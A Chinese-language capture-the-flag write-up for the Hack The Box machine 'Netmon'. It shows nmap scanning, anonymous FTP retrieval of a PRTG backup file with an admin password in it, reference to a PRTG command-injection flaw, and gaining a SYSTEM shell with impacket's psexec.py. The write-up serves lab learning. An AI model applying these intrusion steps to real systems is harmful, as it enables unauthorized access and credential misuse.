Netmon
这是第一次做Tracks的机器,可以说全程是跟着writeup做的。好菜🥦啊
先是nmap
扫一下
sudo nmap -sC -sS -sV [ip-address]
发现ftp服务,而且允许匿名登录;还发现了Paessler PRTG bandwidth monitor 软件,这是一款流量监控软件。我们可以寻找其配置文件,因为这很可能隐藏着敏感信息。根据How and where does PRTG store its data?得知其数据文件存储在%programdata%\Paessler\PRTG Network Monitor
,进入该目录看一下。
在进入时,一开始ls
并没有显示ProgramData
目录,通过社区询问可能是因为隐藏文件的原因所以用dir -ah
才把ProgramData
目录显示出来。
发现除了PRTG Configuration.dat
、PRTG Configuration.old
、PRTG Graph Data Cache.dat
外还有一个文档中没有提及的PRTG Configuration.old.bak
很显然这是该计算机用户自己创建的文件,很有必要看一下
get Configuration.old.bak
发现了一组账号密码
<!-- User: prtgadmin -->
PrTg@dmin2018
进入[ip-address]
登录密码错误,将密码改成PrTg@dmin2019
后登录成功。看到这里的时候再次感叹网安有时候就是这么不讲道理啊😥
下面就是根据PRTG < 18.2.39 Command Injection Vulnerability里来做的了。
按照步骤触发后使用psexec
连接。这个工具是Microsoft开发的PsExec v2.34,所以很显然这是在Windows上运行的,想要在Kali上运行需要这个👉psexec.py
首先我们需要下载impacket
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
chmod +x setup.py
sudo ./setup.py
使用该工具连接主机,拿到系统shell
─$ psexec.py htb:'abc123!'@10.10.10.152
然后在根目录查找完全找不到,一度以为我的命令错了😥
dir flag.* /p /s
突然想到进入Administrator目录看一下,发现一个叫root.txt
的文件,type
发现是找了好久的flag😡没想到居然改名了。
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of C:\Users\Administrator\Desktop
02/03/2019 12:35 AM <DIR> .
02/03/2019 12:35 AM <DIR> ..
05/15/2022 08:40 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,765,780,992 bytes free
C:\Users\Administrator\Desktop> type root.txt